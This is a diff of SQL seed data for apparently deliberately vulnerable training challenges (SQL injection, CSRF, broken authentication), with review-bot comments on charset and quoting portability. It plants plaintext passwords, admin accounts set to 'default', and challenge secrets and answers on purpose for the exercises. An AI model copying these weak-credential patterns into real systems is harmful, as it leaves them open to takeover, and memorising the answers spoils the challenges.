-- Data for table `SQLiC5Shop`.`items`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`SQLiC5Shop`;
-INSERT INTO `SQLiC5Shop`.`items` (`itemId`, `itemName`, `itemCost`)
-VALUES (1, 'Pineapple', 30);
-INSERT INTO `SQLiC5Shop`.`items` (`itemId`, `itemName`, `itemCost`)
-VALUES (2, 'Orange', 3000);
-INSERT INTO `SQLiC5Shop`.`items` (`itemId`, `itemName`, `itemCost`)
-VALUES (3, 'Apple', 45);
-INSERT INTO `SQLiC5Shop`.`items` (`itemId`, `itemName`, `itemCost`)
-VALUES (4, 'Banana', 15);
+USE `SQLiC5Shop`;
+INSERT INTO `SQLiC5Shop`.`items` (`itemId`, `itemName`, `itemCost`) VALUES (1, 'Pineapple', 30);
+INSERT INTO `SQLiC5Shop`.`items` (`itemId`, `itemName`, `itemCost`) VALUES (2, 'Orange', 3000);
+INSERT INTO `SQLiC5Shop`.`items` (`itemId`, `itemName`, `itemCost`) VALUES (3, 'Apple', 45);
+INSERT INTO `SQLiC5Shop`.`items` (`itemId`, `itemName`, `itemCost`) VALUES (4, 'Banana', 15);
COMMIT;
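Review bot: The `SQLiC5Shop` schema is created with `DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci`, while `directObjectRefChalTwo` earlier in this hunk uses utf8mb4. In MySQL, `utf8` is an alias for the 3-byte utf8mb3 and is deprecated in 8.0, so characters outside the BMP cannot be stored in these tables and the schemas behave differently from their neighbours. Unless a challenge depends on the 3-byte charset (not visible here), I would use `DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci` for this schema too. The same clause appears in the later hunks for `SqlChalFourSuperSecure`, `SqlChalSix`, `csrfChallengeEnumTokens` and `csrfChallengeFour`.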
@@ -764,20 +444,13 @@ COMMIT;
-- Data for table `SQLiC5Shop`.`coupons`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`SQLiC5Shop`;
-INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (1, 100, 'PleaseTakeAFruit', 3);
-INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (2, 100, 'FruitForFree', 3);
-INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (3, 10, 'PleaseTakeAnOrange', 2);
-INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (4, 50, 'HalfOffOranges', 2);
-INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (5, 10, 'PleaseTakeABanana', 4);
-INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (6, 50, 'HalfOffBananas', 4);
+USE `SQLiC5Shop`;
+INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (1, 100, 'PleaseTakeAFruit', 3);
+INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (2, 100, 'FruitForFree', 3);
+INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (3, 10, 'PleaseTakeAnOrange', 2);
+INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (4, 50, 'HalfOffOranges', 2);
+INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (5, 10, 'PleaseTakeABanana', 4);
+INSERT INTO `SQLiC5Shop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (6, 50, 'HalfOffBananas', 4);
COMMIT;
@@ -785,24 +458,18 @@ COMMIT;
-- Data for table `SQLiC5Shop`.`vipCoupons`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`SQLiC5Shop`;
-INSERT INTO `SQLiC5Shop`.`vipCoupons` (`vipCouponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (861267, 100, 'spcil\/|Pse3cr3etCouponStu.f4rU176', 2);
+USE `SQLiC5Shop`;
+INSERT INTO `SQLiC5Shop`.`vipCoupons` (`vipCouponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (861267, 100, 'spcil\/|Pse3cr3etCouponStu.f4rU176', 2);
COMMIT;
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
-DROP SCHEMA IF EXISTS `SqlChalFourSuperSecure`;
-CREATE SCHEMA IF NOT EXISTS `SqlChalFourSuperSecure` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;
-USE
-`SqlChalFourSuperSecure` ;
+DROP SCHEMA IF EXISTS `SqlChalFourSuperSecure` ;
+CREATE SCHEMA IF NOT EXISTS `SqlChalFourSuperSecure` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci ;
+USE `SqlChalFourSuperSecure` ;
-- ======================================================
-- SQL Injection Challenge 4
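Review bot: The `vipCoupons` insert writes the coupon code as `'spcil\/|Pse3cr3etCouponStu.f4rU176'`, and what MySQL stores for `\/` depends on the session sql_mode. With backslash escapes enabled (the default) the unknown escape drops the backslash and the stored code contains `/|`; with NO_BACKSLASH_ESCAPES the backslash is kept. This hunk sets no sql_mode before the insert, so the value the application has to match is decided by the server configuration. If the backslash is meant to be part of the code, write it as `\\/` and pin the mode for this transaction; if not, drop it from the literal so both modes store the same bytes.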
@@ -811,62 +478,32 @@ USE
-- -----------------------------------------------------
-- Table `SqlChalFourSuperSecure`.`users`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `SqlChalFourSuperSecure`.`users`
-(
- `idusers`
- INT
- NOT
- NULL
- AUTO_INCREMENT,
- `userName`
- VARCHAR
-(
- 45
-) NOT NULL,
- `userPassword` VARCHAR
-(
- 45
-) NOT NULL,
- PRIMARY KEY
-(
- `idusers`
-),
- UNIQUE INDEX `userName_UNIQUE`
-(
- `userName` ASC
-))
- ENGINE = InnoDB;
-
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE TABLE IF NOT EXISTS `SqlChalFourSuperSecure`.`users` (
+ `idusers` INT NOT NULL AUTO_INCREMENT,
+ `userName` VARCHAR(45) NOT NULL,
+ `userPassword` VARCHAR(45) NOT NULL,
+ PRIMARY KEY (`idusers`),
+ UNIQUE INDEX `userName_UNIQUE` (`userName` ASC))
+ENGINE = InnoDB;
+
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
-- -----------------------------------------------------
-- Data for table `SqlChalFourSuperSecure`.`users`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`SqlChalFourSuperSecure`;
-INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`)
-VALUES (1, 'adam', '87i2ueeu2ndsedssda');
-INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`)
-VALUES (2, 'player', '87iueeundsedssda');
-INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`)
-VALUES (3, 'user', 'password');
-INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`)
-VALUES (4, 'mark', 'password');
-INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`)
-VALUES (5, 'sean', 'password');
-INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`)
-VALUES (6, 'denihan', 'password');
-INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`)
-VALUES (7, 'admin', "98y\'98hsadsoi!111,.,22ee");
-INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`)
-VALUES (8, 'duggan', 'password');
+USE `SqlChalFourSuperSecure`;
+INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`) VALUES (1, 'adam', '87i2ueeu2ndsedssda');
+INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`) VALUES (2, 'player', '87iueeundsedssda');
+INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`) VALUES (3, 'user', 'password');
+INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`) VALUES (4, 'mark', 'password');
+INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`) VALUES (5, 'sean', 'password');
+INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`) VALUES (6, 'denihan', 'password');
+INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`) VALUES (7, 'admin', "98y\'98hsadsoi!111,.,22ee");
+INSERT INTO `SqlChalFourSuperSecure`.`users` (`idusers`, `userName`, `userPassword`) VALUES (8, 'duggan', 'password');
COMMIT;
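Review bot: The `admin` row uses a double-quoted literal, `"98y\'98hsadsoi!111,.,22ee"`, and it runs after `SET SQL_MODE=@OLD_SQL_MODE;` has restored the server's own mode. If that mode includes ANSI_QUOTES, the double-quoted token is parsed as an identifier and the insert fails; `\'` also depends on backslash escapes being enabled. A single-quoted literal with a doubled quote is mode-independent: `VALUES (7, 'admin', '98y''98hsadsoi!111,.,22ee');`. The `David` row in the `SqlChalSix` hunk has the same form (`"Don\'t get me started"`) and could become `'Don''t get me started'`.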
@@ -876,83 +513,44 @@ COMMIT;
-- -----------------------------------------------------
-- -----------------------------------------------------
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
-DROP SCHEMA IF EXISTS `SqlChalSix`;
-CREATE SCHEMA IF NOT EXISTS `SqlChalSix` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;
-USE
-`SqlChalSix` ;
+DROP SCHEMA IF EXISTS `SqlChalSix` ;
+CREATE SCHEMA IF NOT EXISTS `SqlChalSix` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci ;
+USE `SqlChalSix` ;
-- -----------------------------------------------------
-- Table `SqlChalSix`.`users`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `SqlChalSix`.`users`
-(
- `idusers`
- INT
- NOT
- NULL,
- `userName`
- VARCHAR
-(
- 45
-) NOT NULL,
- `userPin` VARCHAR
-(
- 16
-) NOT NULL,
- `userQuestion` VARCHAR
-(
- 128
-) NOT NULL,
- `userAnswer` VARCHAR
-(
- 191
-) NOT NULL,
- `userAge` VARCHAR
-(
- 16
-) NOT NULL,
- PRIMARY KEY
-(
- `idusers`
-))
- ENGINE = InnoDB;
-
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE TABLE IF NOT EXISTS `SqlChalSix`.`users` (
+ `idusers` INT NOT NULL,
+ `userName` VARCHAR(45) NOT NULL,
+ `userPin` VARCHAR(16) NOT NULL,
+ `userQuestion` VARCHAR(128) NOT NULL,
+ `userAnswer` VARCHAR(191) NOT NULL,
+ `userAge` VARCHAR(16) NOT NULL,
+ PRIMARY KEY (`idusers`))
+ENGINE = InnoDB;
+
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
-- -----------------------------------------------------
-- Data for table `SqlChalSix`.`users`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`SqlChalSix`;
-INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`)
-VALUES (1, 'George', '8367', 'What is your favourite Flower', 'A Red Rose', '23');
-INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`)
-VALUES (2, 'Brendan', '4685', 'What is the answer to this level?',
- '17f999a8b3fbfde54124d6e94b256a264652e5087b14622e1644c884f8a33f82', '98');
-INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`)
-VALUES (3, 'Sean', '1254', 'Your favourite Viking', 'Thor', '25');
-INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`)
-VALUES (4, 'Anthony', '7844', 'What game do I suck at?', 'All of the games', '84');
-INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`)
-VALUES (5, 'Owen', '4648', 'Favourite Sandwhich Topping', 'Peanutbutter', '33');
-INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`)
-VALUES (6, 'Eoin', '2653', 'Where did I holiday in the summer of 69?', 'The Dark Side of the Moon', '12');
-INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`)
-VALUES (7, 'David', '3598', 'This is how we get ants', "Don\'t get me started", '6');
+USE `SqlChalSix`;
+INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`) VALUES (1, 'George', '8367', 'What is your favourite Flower', 'A Red Rose', '23');
+INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`) VALUES (2, 'Brendan', '4685', 'What is the answer to this level?', '17f999a8b3fbfde54124d6e94b256a264652e5087b14622e1644c884f8a33f82', '98');
+INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`) VALUES (3, 'Sean', '1254', 'Your favourite Viking', 'Thor', '25');
+INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`) VALUES (4, 'Anthony', '7844', 'What game do I suck at?', 'All of the games', '84');
+INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`) VALUES (5, 'Owen', '4648', 'Favourite Sandwhich Topping', 'Peanutbutter', '33');
+INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`) VALUES (6, 'Eoin', '2653', 'Where did I holiday in the summer of 69?', 'The Dark Side of the Moon', '12');
+INSERT INTO `SqlChalSix`.`users` (`idusers`, `userName`, `userPin`, `userQuestion`, `userAnswer`, `userAge`) VALUES (7, 'David', '3598', 'This is how we get ants', "Don\'t get me started", '6');
COMMIT;
@@ -962,36 +560,22 @@ COMMIT;
-- -----------------------------------------------------
-- -----------------------------------------------------
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
-DROP SCHEMA IF EXISTS `csrfChallengeEnumTokens`;
-CREATE SCHEMA IF NOT EXISTS `csrfChallengeEnumTokens` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;
-USE
-`csrfChallengeEnumTokens` ;
+DROP SCHEMA IF EXISTS `csrfChallengeEnumTokens` ;
+CREATE SCHEMA IF NOT EXISTS `csrfChallengeEnumTokens` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci ;
+USE `csrfChallengeEnumTokens` ;
-- -----------------------------------------------------
-- Table `csrfChallengeEnumTokens`.`csrfTokens`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `csrfChallengeEnumTokens`.`csrfTokens`
-(
- `userId` VARCHAR
-(
- 64
-) NOT NULL,
- `csrfTokenscol` VARCHAR
-(
- 191
-) NULL,
- PRIMARY KEY
-(
- `userId`
-))
- ENGINE = InnoDB;
+CREATE TABLE IF NOT EXISTS `csrfChallengeEnumTokens`.`csrfTokens` (
+ `userId` VARCHAR(64) NOT NULL,
+ `csrfTokenscol` VARCHAR(191) NULL,
+ PRIMARY KEY (`userId`))
+ENGINE = InnoDB;
-- -----------------------------------------------------
-- -----------------------------------------------------
@@ -999,36 +583,22 @@ CREATE TABLE IF NOT EXISTS `csrfChallengeEnumTokens`.`csrfTokens`
-- -----------------------------------------------------
-- -----------------------------------------------------
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
-DROP SCHEMA IF EXISTS `csrfChallengeFour`;
-CREATE SCHEMA IF NOT EXISTS `csrfChallengeFour` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;
-USE
-`csrfChallengeFour` ;
+DROP SCHEMA IF EXISTS `csrfChallengeFour` ;
+CREATE SCHEMA IF NOT EXISTS `csrfChallengeFour` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci ;
+USE `csrfChallengeFour` ;
-- -----------------------------------------------------
-- Table `csrfChallengeFour`.`csrfTokens`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `csrfChallengeFour`.`csrfTokens`
-(
- `userId` VARCHAR
-(
- 64
-) NOT NULL,
- `csrfTokenscol` VARCHAR
-(
- 191
-) NULL,
- PRIMARY KEY
-(
- `userId`
-))
- ENGINE = InnoDB;
+CREATE TABLE IF NOT EXISTS `csrfChallengeFour`.`csrfTokens` (
+ `userId` VARCHAR(64) NOT NULL,
+ `csrfTokenscol` VARCHAR(191) NULL,
+ PRIMARY KEY (`userId`))
+ENGINE = InnoDB;
-- -----------------------------------------------------
-- -----------------------------------------------------
@@ -1036,122 +606,66 @@ CREATE TABLE IF NOT EXISTS `csrfChallengeFour`.`csrfTokens`
-- -----------------------------------------------------
-- -----------------------------------------------------
-DROP SCHEMA IF EXISTS `BrokenAuthAndSessMangChalFive`;
-CREATE SCHEMA IF NOT EXISTS `BrokenAuthAndSessMangChalFive` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`BrokenAuthAndSessMangChalFive`;
+DROP SCHEMA IF EXISTS `BrokenAuthAndSessMangChalFive` ;
+CREATE SCHEMA IF NOT EXISTS `BrokenAuthAndSessMangChalFive` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `BrokenAuthAndSessMangChalFive`;
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
-- -----------------------------------------------------
-- Table `BrokenAuthAndSessMangChalFive`.`users`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `BrokenAuthAndSessMangChalFive`.`users`
-(
- `userId`
- INT
- NOT
- NULL,
- `userName`
- VARCHAR
-(
- 32
-) NOT NULL ,
- `userPassword` VARCHAR
-(
- 128
-) NOT NULL ,
- `userAddress` VARCHAR
-(
- 128
-) NOT NULL ,
- `userRole` VARCHAR
-(
- 8
-) NOT NULL DEFAULT 'guest' ,
- PRIMARY KEY
-(
- `userId`
-) )
- ENGINE = InnoDB;
-
-
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE TABLE IF NOT EXISTS `BrokenAuthAndSessMangChalFive`.`users` (
+ `userId` INT NOT NULL ,
+ `userName` VARCHAR(32) NOT NULL ,
+ `userPassword` VARCHAR(128) NOT NULL ,
+ `userAddress` VARCHAR(128) NOT NULL ,
+ `userRole` VARCHAR(8) NOT NULL DEFAULT 'guest' ,
+ PRIMARY KEY (`userId`) )
+ENGINE = InnoDB;
+
+
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
-- -----------------------------------------------------
-- Data for table `BrokenAuthAndSessMangChalFive`.`users`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`BrokenAuthAndSessMangChalFive`;
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (12, 'admin', 'default', 'zoidberg22@shepherd.com', 'admin');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (321, 'administrator', 'default', 'buzzthebald@shepherd.com', 'admin');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (3212, 'root', 'default', 'elitehacker@shepherd.com', 'admin');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (634, 'superuser', 'default', 'superman@security.com', 'admin');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (4524, 'privileged', 'default', 'spoiltbrat@security.com', 'admin');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (40, 'guest1', 'default', 'guest1@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (41, 'guest2', 'default', 'guest2@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (42, 'guest3', 'default', 'guest3@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (43, 'guest4', 'default', 'guest4@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (44, 'guest5', 'default', 'guest5@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (45, 'guest6', 'default', 'guest6@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (46, 'guest7', 'default', 'guest7@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (47, 'guest8', 'default', 'guest8@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (48, 'guest9', 'guest', 'guest9@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (49, 'guest11', 'guest', 'guest11@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (50, 'guest12', 'guest', 'guest12@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (51, 'guest13', 'guest', 'guest13@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (52, 'guest14', 'guest', 'guest14@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (53, 'guest15', 'guest', 'guest15@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (54, 'guest16', 'guest', 'guest16@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (55, 'guest17', 'guest', 'guest17@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (56, 'guest18', 'guest', 'guest18@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (57, 'guest19', 'guest', 'guest19@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (58, 'guest20', 'guest', 'guest20@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (59, 'guest21', 'guest', 'guest21@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (60, 'guest22', 'guest', 'guest22@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (61, 'guest23', 'guest', 'guest23@guest.com', 'guest');
-INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (62, 'guest10', 'guest', 'guest10@guest.com', 'guest');
+USE `BrokenAuthAndSessMangChalFive`;
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (12, 'admin', 'default', 'zoidberg22@shepherd.com', 'admin');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (321, 'administrator', 'default', 'buzzthebald@shepherd.com', 'admin');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (3212, 'root', 'default', 'elitehacker@shepherd.com', 'admin');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (634, 'superuser', 'default', 'superman@security.com', 'admin');
